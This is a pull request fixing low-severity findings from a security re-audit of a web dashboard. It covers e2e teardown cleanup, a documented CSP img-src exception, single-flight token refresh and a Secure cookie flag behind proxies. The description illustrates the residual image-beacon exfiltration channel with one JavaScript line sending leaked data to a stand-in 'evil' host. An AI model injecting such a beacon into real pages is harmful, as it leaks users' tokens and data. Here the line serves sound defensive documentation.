### PR TITLE
fix(security): wave-3 frontend re-audit fixes (W3-F)

### DIFF
--- a/web/e2e/global-teardown.test.ts
+++ b/web/e2e/global-teardown.test.ts
@@ -1,7 +1,7 @@
+import { afterEach, beforeEach, describe, expect, test } from "bun:test";
 import { existsSync, mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
-import { afterEach, beforeEach, describe, expect, test } from "bun:test";
 import { runGlobalTeardown } from "./global-teardown";
 
 /**

--- a/web/e2e/global-teardown.test.ts
+++ b/web/e2e/global-teardown.test.ts
@@ -1,0 +1,65 @@
+import { existsSync, mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { afterEach, beforeEach, describe, expect, test } from "bun:test";
+import { runGlobalTeardown } from "./global-teardown";
+
+/**
+ * SEC-076 regression tests: the e2e harness builds web/.next with
+ * E2E_ALLOW_INSECURE_HTTP (no HSTS / upgrade-insecure-requests), so teardown
+ * must remove that artifact even when global-setup died before writing the
+ * PID file (the file is written last — a mid-setup failure previously made
+ * teardown return early and leave the insecure build in the tree).
+ */
+
+let workDir: string;
+
+beforeEach(() => {
+  workDir = mkdtempSync(join(tmpdir(), "steward-teardown-test-"));
+});
+
+afterEach(() => {
+  rmSync(workDir, { recursive: true, force: true });
+});
+
+function makeNextDir(): string {
+  const nextDir = join(workDir, ".next");
+  mkdirSync(nextDir, { recursive: true });
+  writeFileSync(join(nextDir, "build-marker"), "e2e");
+  return nextDir;
+}
+
+describe("e2e global teardown (SEC-076)", () => {
+  test("removes .next even when the PID file was never written (failed setup)", async () => {
+    const nextDir = makeNextDir();
+
+    await runGlobalTeardown(join(workDir, ".e2e-pids.json"), nextDir);
+
+    expect(existsSync(nextDir)).toBe(false);
+  });
+
+  test("removes .next, the PID file, and the data dir on a normal run", async () => {
+    const nextDir = makeNextDir();
+    const dataDir = join(workDir, "e2e-data");
+    mkdirSync(dataDir, { recursive: true });
+    const pidFile = join(workDir, ".e2e-pids.json");
+    // Bogus pids: killPid swallows ESRCH for already-gone processes.
+    writeFileSync(pidFile, JSON.stringify({ web: 999999, api: 999998, dataDir }));
+
+    await runGlobalTeardown(pidFile, nextDir);
+
+    expect(existsSync(nextDir)).toBe(false);
+    expect(existsSync(pidFile)).toBe(false);
+    expect(existsSync(dataDir)).toBe(false);
+  });
+
+  test("still removes .next when the PID file is corrupt", async () => {
+    const nextDir = makeNextDir();
+    writeFileSync(join(workDir, ".e2e-pids.json"), "not json{");
+
+    // The parse error still surfaces (teardown reports the failure), but the
+    // finally-block must have removed the insecure build artifact first.
+    await expect(runGlobalTeardown(join(workDir, ".e2e-pids.json"), nextDir)).rejects.toThrow();
+    expect(existsSync(nextDir)).toBe(false);
+  });
+});

--- a/web/e2e/global-teardown.ts
+++ b/web/e2e/global-teardown.ts
@@ -2,6 +2,7 @@ import { existsSync, readFileSync, rmSync } from "node:fs";
 import { join } from "node:path";
 
 const PID_FILE = join(__dirname, ".e2e-pids.json");
+const NEXT_BUILD_DIR = join(__dirname, "..", ".next");
 
 function killPid(pid: number | undefined): void {
   if (!pid) return;
@@ -24,24 +25,39 @@ async function removeDirWithRetry(path: string): Promise<void> {
   }
 }
 
-export default async function globalTeardown(): Promise<void> {
-  if (!existsSync(PID_FILE)) return;
-  const raw = JSON.parse(readFileSync(PID_FILE, "utf8")) as {
-    fakeOAuth?: number;
-    api?: number;
-    web?: number;
-    dataDir?: string;
-  };
-  killPid(raw.web);
-  killPid(raw.api);
-  killPid(raw.fakeOAuth);
-  if (raw.dataDir && existsSync(raw.dataDir)) {
-    await removeDirWithRetry(raw.dataDir);
+/**
+ * Exported for tests; Playwright calls the default export, which binds the
+ * real harness paths.
+ */
+export async function runGlobalTeardown(pidFile: string, nextBuildDir: string): Promise<void> {
+  try {
+    // The PID file is written LAST in global-setup, so a failed setup can
+    // leave no file while still having produced a flag-built .next — process
+    // cleanup is best-effort and must not gate the artifact removal below.
+    if (existsSync(pidFile)) {
+      const raw = JSON.parse(readFileSync(pidFile, "utf8")) as {
+        fakeOAuth?: number;
+        api?: number;
+        web?: number;
+        dataDir?: string;
+      };
+      killPid(raw.web);
+      killPid(raw.api);
+      killPid(raw.fakeOAuth);
+      if (raw.dataDir && existsSync(raw.dataDir)) {
+        await removeDirWithRetry(raw.dataDir);
+      }
+      rmSync(pidFile, { force: true });
+    }
+  } finally {
+    // SEC-076: the harness builds .next with E2E_ALLOW_INSECURE_HTTP (no HSTS /
+    // upgrade-insecure-requests). Never leave that artifact in the working tree
+    // where it could be deployed by accident — even when setup failed before
+    // writing the PID file (the early return that used to skip this).
+    await removeDirWithRetry(nextBuildDir);
   }
-  rmSync(PID_FILE, { force: true });
+}
 
-  // SEC-076: the harness builds .next with E2E_ALLOW_INSECURE_HTTP (no HSTS /
-  // upgrade-insecure-requests). Never leave that artifact in the working tree
-  // where it could be deployed by accident.
-  await removeDirWithRetry(join(__dirname, "..", ".next"));
+export default async function globalTeardown(): Promise<void> {
+  await runGlobalTeardown(PID_FILE, NEXT_BUILD_DIR);
 }

--- a/web/playwright.config.ts
+++ b/web/playwright.config.ts
@@ -12,7 +12,15 @@ function shouldUseNextDevServer(): boolean {
 
 export default defineConfig({
   testDir: "./e2e",
-  testIgnore: ["**/global-setup.ts", "**/global-teardown.ts", "**/fixtures/**", "**/wallets/**"],
+  // *.test.ts under e2e/ are bun unit tests (e.g. global-teardown.test.ts),
+  // not Playwright specs — keep them out of the runner.
+  testIgnore: [
+    "**/global-setup.ts",
+    "**/global-teardown.ts",
+    "**/fixtures/**",
+    "**/wallets/**",
+    "**/*.test.ts",
+  ],
   fullyParallel: false,
   forbidOnly: !!process.env.CI,
   // One retry absorbs inherent UI-timing flakiness in the dashboard render

--- a/web/src/lib/csp.test.ts
+++ b/web/src/lib/csp.test.ts
@@ -12,6 +12,12 @@ function connectSrc(csp: string): string[] {
   return directive.slice("connect-src ".length).split(" ");
 }
 
+function imgSrc(csp: string): string[] {
+  const directive = csp.split("; ").find((d) => d.startsWith("img-src "));
+  if (!directive) throw new Error("img-src directive missing");
+  return directive.slice("img-src ".length).split(" ");
+}
+
 describe("CSP connect-src allowlist (SEC-077)", () => {
   afterEach(() => {
     delete process.env.NEXT_PUBLIC_SOLANA_RPC_URL;
@@ -81,5 +87,19 @@ describe("CSP connect-src allowlist (SEC-077)", () => {
     // API origin, so it is deliberately omitted for that configuration only.
     delete process.env.NEXT_PUBLIC_STEWARD_API_URL;
     expect(buildCsp("nonce", false)).not.toContain("upgrade-insecure-requests");
+  });
+});
+
+describe("CSP img-src (SEC-077 residual channel)", () => {
+  test("keeps only the documented tenant-logo exception — never a full wildcard or plain http", () => {
+    // Tenant theme logos/favicons are operator-supplied URLs on arbitrary
+    // https origins, so `https:` cannot be dropped without breaking tenant
+    // branding (documented at the directive in csp.ts). What must never
+    // regress: a bare `*` or plain `http:` source, which would widen the
+    // residual GET-only beacon channel beyond encrypted origins.
+    const sources = imgSrc(buildCsp("nonce", false));
+    expect(sources).toEqual(["'self'", "data:", "blob:", "https:"]);
+    expect(sources).not.toContain("*");
+    expect(sources).not.toContain("http:");
   });
 });

--- a/web/src/lib/csp.ts
+++ b/web/src/lib/csp.ts
@@ -6,9 +6,8 @@ import { DEFAULT_STEWARD_API_URL } from "@/lib/steward-api-url";
  *
  * SEC-077: `connect-src` is an explicit allowlist instead of the previous
  * blanket `https: wss:`, which let any injected script exfiltrate data to any
- * origin — undermining the CSP's role as the primary XSS mitigation for the
- * tokens the dashboard handles. The list covers exactly what the wallet dapp
- * needs:
+ * origin via fetch/XHR/WebSocket — the channels that carry structured request
+ * bodies. The list covers exactly what the wallet dapp needs:
  *   - 'self' (same-origin API proxy routes, Next data fetches, dev HMR)
  *   - the configured Steward API origin
  *   - the configured Solana RPC origin (https + its websocket form)
@@ -112,6 +111,15 @@ export function buildCsp(nonce: string, allowInsecureHttp: boolean): string {
     "default-src 'self'",
     `script-src 'self' 'nonce-${nonce}' 'wasm-unsafe-eval'`,
     "style-src 'self' 'unsafe-inline' https://fonts.googleapis.com",
+    // https: is a deliberate, documented exception to the connect-src
+    // allowlist model: tenant theme logos/favicons (dashboard settings →
+    // appearance) are operator-supplied URLs hosted on arbitrary origins, so
+    // no fixed allowlist can cover them. This leaves a residual GET-only
+    // beacon channel (an injected script could leak via `new Image().src`) —
+    // accepted because image loads cannot read responses, the nonce-gated
+    // script-src is the barrier for script execution in the first place, and
+    // breaking tenant branding is not a trade we can make silently. Never add
+    // a plain `http:` or `*` here.
     "img-src 'self' data: blob: https:",
     "font-src 'self' data: https://fonts.gstatic.com",
     `connect-src ${connectSrc.join(" ")}`,


### PR DESCRIPTION
## Re-audit batch W3-F (web/ + SDK auth) — wave-3 frontend fixes

Fixes the four LOW findings assigned to this batch from the verification re-audit of the wave-2/2b remediations.

| # | Finding | File(s) | Status |
|---|---------|---------|--------|
| 1 | SEC-076 cleanup unreachable on failed runs: `.next` removal sat after an early return when the PID file is missing, but the PID file is only written at the END of global-setup | `web/e2e/global-teardown.ts` | **FIXED** |
| 2 | `img-src 'self' data: blob: https:` leaves a wildcard beacon/exfil channel that bypasses the SEC-077 `connect-src` allowlist | `web/src/lib/csp.ts` | **FIXED** (documentation route — see trade-offs) |
| 3 | No in-flight refresh dedup: concurrent near-expiry `getToken()` calls race cookie rotation; the stale-credential request trips rotation reuse-detection and signs the user out | `packages/sdk/src/auth.ts` | **FIXED** |
| 4 | `Secure` flag keyed off `request.url` protocol: behind a TLS-terminating proxy with `next start` the cookie silently drops `Secure` | `web/src/lib/auth-proxy.ts` | **FIXED** |

### What changed

1. **E2E teardown always removes the flag-built `.next`** — the PID file is written last in global-setup, so a mid-setup failure (e.g. web server never came up after the build) made teardown return early and leave the `E2E_ALLOW_INSECURE_HTTP`-built `.next` in the tree, where it could be deployed by accident. Extracted a testable `runGlobalTeardown(pidFile, nextBuildDir)`, dropped the early return, and wrapped process cleanup in `try/finally` so artifact removal always runs (even on a corrupt PID file — the parse error still surfaces after cleanup). Added bun unit tests; Playwright excludes them via a `**/*.test.ts` `testIgnore` entry.

2. **CSP `img-src` exception documented, stale claim removed** — the SEC-077 header claimed the `connect-src` allowlist closed exfiltration "to any origin", but `img-src` still permits `https:` (a GET-only beacon channel: `new Image().src='https://evil/'+leak`). Tightening `img-src` to the `connect-src` allowlist is **not viable**: tenant theme logos/favicons (dashboard settings → appearance) are operator-supplied URLs on arbitrary origins, and breaking tenant branding silently is worse than the residual GET-only channel. Per the finding's sanctioned alternative: the exception is documented at the directive, the header claim is scoped to fetch/XHR/WebSocket channels, and a regression test pins `img-src` to exactly `'self' data: blob: https:` so it can never silently widen to `*` or plain `http:`.

3. **Single-flight SDK session refresh** — `refreshSession()` now shares one in-flight promise across concurrent callers (both the auth-proxy cookie path and the direct `/auth/refresh` path). `switchTenant()` — itself a refresh with a `tenantId` — waits out any in-flight refresh (re-checking in a loop, since a new one can slip in between microtasks), reads the rotated token only after the wait, and runs as the tracked in-flight refresh so background `getToken()` callers share it instead of racing it.

4. **`Secure` survives TLS-terminating proxies** — `isHttpsRequest` now honors `X-Forwarded-Proto` (set by the reference nginx config) as an **upgrade-only** signal: it can add `Secure` to an `http:` request URL, but a spoofed `http` value can never downgrade a genuinely-https URL, and a spoofed `https` on plain http just yields a cookie the browser rejects — fail-closed both ways. The plain-http local dev/e2e origin still omits `Secure` so browsers accept the cookie there.

### Trade-offs / notes

- Item 2 takes the finding's documentation route rather than tightening: the tenant theme `logoUrl`/`faviconUrl` feature requires arbitrary `https:` image origins. The residual GET-only beacon channel is now explicitly documented at the directive; the nonce-gated `script-src` remains the actual barrier against injected-script execution.
- Item 3: a `refreshSession()` that starts during a `switchTenant()` shares the switch's refresh and returns the tenant-switched session — correct, since that is the current valid session. Concurrent `switchTenant()` calls with different tenants remain last-write-wins (pre-existing, pathological UI case).
- Item 4: trusting `X-Forwarded-Proto` is safe here because it can only *add* `Secure`; deployments fronted by the reference nginx config get the flag automatically.

### Validation

- `bun test` web: **65 pass / 0 fail** across 11 files (incl. new `e2e/global-teardown.test.ts`, `csp.test.ts`, `auth-proxy.test.ts`, `auth-routes.test.ts` regression tests)
- `bun test` packages/sdk (all 12 files, per-file processes): **272 pass / 0 fail** (incl. 4 new single-flight tests in `auth-refresh-proxy.test.ts`)
- `bunx tsc --noEmit`: clean for `web` and `packages/sdk`
- `bunx biome check` on all changed files: clean
- `playwright test --list`: 147 tests in 27 files discovered; the new bun unit test is correctly excluded
- Full Playwright e2e not run locally (requires the full harness); teardown change is covered by the new unit tests.
